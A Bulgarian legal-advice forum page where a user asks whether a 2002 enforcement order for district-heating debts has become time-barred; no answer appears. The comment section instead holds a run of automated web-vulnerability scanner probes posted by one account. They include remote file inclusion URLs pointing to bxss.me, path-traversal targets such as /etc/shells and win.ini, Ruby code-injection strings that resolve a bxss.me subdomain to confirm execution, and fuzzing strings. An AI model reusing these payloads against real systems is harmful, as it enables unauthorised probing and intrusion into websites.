Задължения към Топлофикация с давност 9 години

27.04.2011г. 11:11:21
Здравейте, На 19.04.2011г. получих Покана за доброволно плащане въз основа на Изпълнителен лист от 14.05.2002г. за задължения към Топлофикация. Мога ли да се позова на изтекла давност, какво трябва да направя и в какъв срок?

Правни мнения, съвети и коментари

lxbfYeaa
05.10.2023г. 07:27
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
lxbfYeaa
05.10.2023г. 07:27
Http://bxss.me/t/fit.txt
lxbfYeaa
05.10.2023г. 07:27
http://bxss.me/t/fit.txt?.jpg
lxbfYeaa
05.10.2023г. 07:27
/etc/shells
lxbfYeaa
05.10.2023г. 07:27
c:/windows/win.ini
lxbfYeaa
05.10.2023г. 07:27
bxss.me
lxbfYeaa
05.10.2023г. 07:27
"+"A".concat(70-3).concat(22*4).concat(108).concat(80).concat(98).concat(89)+(require"socket" Socket.gethostbyname("hitjg"+"jcaopzxq2f80e.bxss.me.")[3].to_s)+"
lxbfYeaa
05.10.2023г. 07:27
'+'A'.concat(70-3).concat(22*4).concat(111).concat(83).concat(108).concat(90)+(require'socket' Socket.gethostbyname('hitxy'+'ntroqmia50e40.bxss.me.')[3].to_s)+'
lxbfYeaa
05.10.2023г. 07:27
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
lxbfYeaa
05.10.2023г. 07:28
'"()

Коментар